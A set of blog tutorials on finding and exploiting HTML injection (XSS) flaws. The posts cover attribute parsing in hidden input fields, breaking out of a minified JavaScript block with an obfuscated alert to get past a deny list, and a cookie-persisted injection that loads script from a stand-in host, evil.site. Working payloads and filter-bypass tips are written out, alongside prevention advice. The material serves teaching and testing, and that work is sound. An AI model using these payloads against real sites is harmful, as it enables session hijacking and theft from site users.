• Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

    HiddenShrineOfTamoachan

    Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that bypasses validation filters and evades output encoding. Sometimes it’s necessary to explore the dusty passages of shrines to parsing standards in search of a hidden door that reveals an exploit path.

    HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

    Every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of an hidden input field. In the following example, note that the quotation mark has not been filtered or encoded.

    https://web.site/search?sortOn=x"

    <input type="hidden" name="sortOn" value="x"">
    

    If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a <z" sequence to consume it. A <z> tag with an empty attribute is harmless.

    https://web.site/search?sortOn=x"><script>alert(9)</script><z"

    <input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">
    

    Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

    <input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">
    

    Or, taking advantage of new HTML5 events, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

    <input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">
    

    The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

    <input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">
    

    Fortunately, modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, 8.1.2.3 Attributes:

    There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.

    Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle multiple attribute names. Ambiguity leads to security problems – it’s to be avoided at all costs.

    From the spec, 8.2.4.35 Attribute name state:

    When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).

    So, we’ll never be able to fool a browser by “casting” the input field to a different type with a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.

    (The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines parsing rules in HTML Living Standard section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

    Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

    <input name="sortOn"
        value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >
    

    HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection. However, the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

    Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as “the absence of unmitigatable surprise”.

    Look for flaws in modern browsers where this trick works, e.g. maybe a compatibility mode or not using an explicit <!doctype html> weakens the browser’s parsing algorithm. With luck, most of the problems you discover will be implementation errors fixbale within the affected browser rather than a design weakness in the spec.

    HTML5 gives us a better design that minimizes parsing-based security problems. It’s up to web developers to give us better sites that maximize the security of our data.

    • • •
  • Should you find yourself sitting in a tin can, far above the world, it’s reasonable to feel like there’s nothing you can do. Stare out the window and remark that planet earth is blue.

    Bowie Is Ticket

    Should you find yourself writing a web app, with security out of this world, then it’s reasonable to feel like there’s something you forgot to do.

    Here’s a web app that seems secure against HTML injection. Yet with a little creativity it’s exploitable – just tell the browser what it wants to know. Like our distant Major Tom – the papers want to know whose shirts you wear.

    Every countdown to an HTML injection exploit begins with a probe. Here’s a simple one:

    https://web.site/s/ref=page?node="autofocus/onfocus=alert(9);//&search-alias=something
    

    The site responds with a classic reflection inside an <input> field. However, it foils the attack by HTML encoding the quotation mark. After several attempts, we have to admit there’s no way to escape the quoted string:

    <input type="hidden" name="url"
    value="https://web.site/s/ref=page?node=&quot;autofocus/onfocus=alert(9);//&amp;search-alias=something">
    

    Time to move on, but only from that particular payload. Diligence and attention to detail pays off. They’re a common them around here.

    Prior to mutating URL parameters, the original link looked like this:

    https://web.site/s/ref=page?node=412603031&search-alias=something
    

    One behavior that stood out for this page was the reflection of several URL parameters within a JavaScript block. In the original page, the JavaScript was minified and condensed to a single line. We’ll show the affected <script> block with whitespace added in order to more easily understand its semantics. Notice the appearance of the value 412603031 from the node parameter:

    (function(w,d,e,o){
      var i='DAaba0';
      if(w.uDA=w.ues&&w.uet&&w.uex){ues('wb',i,1);uet('bb',i)}
      siteJQ.available('search-js-general', function(){
        SPUtils.afterEvent('spATFEvent', function(){
          o=w.DA;
          if(!o){
            o=w.DA=[];e=d.createElement('script');
            e.src='https://web.site/a.js';
            d.getElementsByTagName('head')[0].appendChild(e)
          }
          o.push({c:904,a:'site=redacted;pt=Search;pid=412603031',w:728,h:90,d:768,f:1,g:''})
        })
      })
    })(window,document)
    

    Basically, it’s an anonymous function that takes four parameters, two of which are evidently the window and document objects since those show up in the calling arguments. If you’re having trouble conceptualizing the previous JavaScript, consider this reduced version:

    (function(w,d,e,o){
      var i='DAaba0';
      o=w.DA;
      if(!o){
        o=w.DA=[]
      }
      o.push({c:904,a:'site=redacted;pid=XSS'})
    })(window,document)
    

    We need to refine the payload for the XSS characters in order to execute arbitrary JavaScript.

    First we add sufficient syntax to terminate the preceding tokens like function declaration and methods. This is as straightforward as counting parentheses and such. For example, the following gets us to a point where the JavaScript engine parses correctly up to the point of the XSS payload.

    (function(w,d,e,o){
      var i='DAaba0';
      o=w.DA;
      if(!o){
        o=w.DA=[]
      }
      o.push({c:904,a:'site=redacted;pid='})
    });XSS'}) })(window,document)
    

    Notice in the previous example that we’ve closed the anonymous function, but there’s no need to execute it. This is the difference between (function(){})() and (function(){}) – we omitted the final () since we’re trying to avoid parsing or execution errors preceding our payload.

    Next, we find a payload that’s appropriate for the injection context. The reflection point is already within a JavaScript execution block. Thus, there’s no need to use a payload with <script> tags, nor do we need to rely on an intrinsic event like onfocus().

    The simplest payload in this case would be alert(9). However, it appears the site might be rejecting any payload with the word “alert” in it. No problem, we’ll turn to a trivial obfuscation method:

    window['a'+'lert'](9)
    

    Since we’re trying to cram several concepts into this tutorial, we’ll wrap the payload inside its own anonymous function. Incidentally, this kind of syntax has the potential to horribly confuse regular expressions with which a developer intended to match balanced parentheses.

    (function(){window['a'+'lert'](9)})()
    

    Recall that in the original site all of the JavaScript was condensed to a single line. This makes it easy for us to clean up the remaining tokens to ensure the browser doesn’t complain about any subsequent parsing errors. Otherwise, the contents of the JavaScript block may not be executed. Therefore, we’ll try throwing in an opening comment delimiter, like this:

    (function(){window['a'+'lert'](9)})()/\*
    

    Oops. The payload fails. In fact, this was where one review of the vuln stopped. The payload never got so complicated as using the obfuscated alert, but it did include the trailing comment delimiter. Since the browser never executed any pop-ups, everyone gave up and called this a false positive. Oops.

    Hackers can be as fallible as the developers that give us these nice vulns to chew on.

    Take a look at the browser’s ever-informative error console. It tells us exactly what went wrong:

    SyntaxError: Multiline comment was not closed properly
    

    Everything following the payload falls on a single line. So, we really should have just used the single line comment delimiter:

    (function(){window['a'+'lert'](9)})()//
    

    And we’re done!

    (For extra points, try figuring out what the syntax might need to be if the JavaScript spanned multiple lines. Hint: This all started with an anonymous function.)

    Here’s the whole payload inside the URL. Make sure to encode the plus operator as %2b – otherwise it’ll be misinterpreted as a space.

    https://web.site/s/ref=page?node='})});(function(){window['a'%2b'lert'](9)})()//&search-alias=something

    And here’s the result within the <script> block.

    (function(w,d,e,o){
      ...
      o.push({c:904,a:'site=redacted;pid='})
    });(function(){window['a'+'lert'](9)})()//'})})(window,document)
    

    There are a few points to review in this example, starting with hints for discovering and exploiting HTML injection:

    • Inspect the entire page for areas where a URL parameter name or value is reflected. Don’t stop at the first instance.
    • Use a payload appropriate for the reflection context. In this case, we could use JavaScript because the reflection appeared within a <script> element.
    • Write clean payloads. Terminate preceding tokens, comment out (or correctly open) subsequent tokens. Pay attention to messages reported in the browser’s error console.
    • Don’t be foiled by sites that put alert or other strings on a deny list. Effective attacks don’t even need to use an alert() function. Know simple obfuscation techniques to bypass deny lists. (Obfuscation really just means an awareness of JavaScript’s objects, methods, and semantics plus creativity.)
    • Use the JavaScript that’s already present. Most sites already have a library like jQuery loaded. Take advantage of $() to create new and exciting elements within the page.

    And here are a few hints for preventing this kind of flaw:

    • Use an encoding mechanism appropriate to the context where data from the client will be displayed. The site correctly used HTML encoding for " characters within the value attribute of an <input> tag, but forgot about dealing with the same value when it was inserted into a JavaScript context.
    • Use string concatenation at your peril. Create helper functions that are harder to misuse.
    • When you find one instance of a programming mistake, search the entire code base for other instances – it’s quicker than waiting for another exploit to appear.
    • Accept that a deny list with alert won’t provide any benefit. Have an idea of how diverse HTML injection payloads can be.

    There’s nothing really odd about JavaScript syntax. It’s a flexible language with several ways of concatenating strings, casting types, and executing methods. We know developers can build sophisticated libraries with JavaScript. We know hackers can build sophisticated exploits with it.

    We know Major Tom’s a junkie, strung out in Heaven’s high, hitting an all-time low. Have fun finding and fixing HTML injection vulns – I’m happy to do so. Hope you’re happy, too.

    • • •
  • Namárië

    Sites that wish to appeal to a global audience use internationalization and localization techniques that substitute text and presentation styles based on a user’s language preferences. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

    Unicode and character encoding like UTF-8 were designed so apps could easily represent the written symbols for these languages.

    A site’s written language conveys meaning to its visitors. A site’s programming language gives headaches to its developers. Misguided devs like to explain why their favored language is superior. Those same devs often prefer not to explain how they end up creating HTML injection vulns with their superior language.

    Several previous posts here have shown how HTML injection attacks are reflected from a URL parameter into a web page, or even how the URL fragment – which doesn’t make a round trip to the app – isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, with the payload having been stored somewhere for later retrieval, such as being associated with a user’s session.

    Sometimes the attack persists in the cookie itself.

    Here’s a site that tracks a locale parameter in the URL, right where we like to test for vulns like XSS.

    https://web.site/page.do?locale=en_US

    There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

    https://web.site/page.do?locale=en_US%22%3E%3Cscript%3Ealert%289%29%3C/script%3E

    Sadly, no reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

    <input type="hidden" name="_locale" value="en_US">
    

    Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How impolite and inhibiting to our attacks.

    Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

    https://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%3Ealert(9)%3C/script%3E%0A%0D

    The catch is that some key characters in the attack have been rendered as their HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body>:

    <body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&# 034;&gt;
    
    &lt;script&gt;alert(9)&lt;/script&gt;
    
    ">
    

    And the title attribute of a <span>:

    <span class="ex-language-select-indicator ex-flag-US" title="US&# 034;&gt;
    
    &lt;script&gt;alert(9)&lt;/script&gt;
    
    "></span>
    

    And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

    <input type="hidden" name="_locale" value="en_US&quot;&gt;
    
    &lt;script&gt;alert(9)&lt;/script&gt;
    
    " id="currentLocale" />
    

    We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages.

    With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag in the following example. We seem to have messed up an xml:lang attribute so much that the payload appears twice:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="https://www.w3.org/1999/xhtml" lang="en-US">
    
    <script>alert(9)</script>
    
    " xml:lang="en-US">
    
    <script>alert(9)</script>
    
    "> <head>
    

    Plus, something we hadn’t seen before on this site – a reflection inside a JavaScript variable near the bottom of the <body> element.

    (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

    <!-- Include the Reference Page Tag script -->
    <!--//BEGIN REFERENCE PAGE TAG SCRIPT-->
    <script> var v = {}; v["v_locale"] = 'en_US"&gt;
    
    &lt;script&gt;alert(9)&lt;/script&gt;
    
    '; </script>
    

    Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

    https://web.site/page.do?locale=en_US">%0A%0D';alert(9)//

    Too bad the apostrophe character (‘) remains encoded:

    <script> var v = {}; v["v_locale"] = 'en_US&# 034;&gt;
    
    &# 039;;alert(9)//'; </script>
    

    That countermeasure shouldn’t stop us. This site’s developers took the time to write some insecure code. The least we can do is spend the time to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

    https://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%20
      src=%22https://evil.site/%22%3E%3C/script%3E%0A%0D
    

    As expected, the page.do’s response contains the HTML encoded version of the payload. We lose quotes, but some of them are actually superfluous for this payload.

    <body id="lang-en" class="tier-level-one cntry-US&# 034;&gt;
    
    &lt;script src=&# 034;https://evil.site/&# 034;&gt;&lt;/script&gt;
    
    ">
    

    Now, if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by evil.site.

    <html xmlns="https://www.w3.org/1999/xhtml" lang="en-US">
    
    <script src="https://evil.site/"></script>
    
    " xml:lang="en-US">
    
    <script src="https://evil.site/"></script>
    
    "> <head>
    

    Yé! utúvienyes!

    I have found it! But what was the underlying mechanism? The GET request to the contact page didn’t contain the payload. It’s just:

    https://web.site/contactUs.do

    Thus, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

    Cookie: v1st=601F242A7B5ED42A; JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
      sessionLocale="en_US\\"> <script src=\\"https://evil.site/\\"></script> ";
      exScreenRes=done
    

    Sometime between the request to page.do and the contact page the site decided to place the locale parameter from page.do into a cookie. Then, the site took the cookie’s value from request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale.

    • • •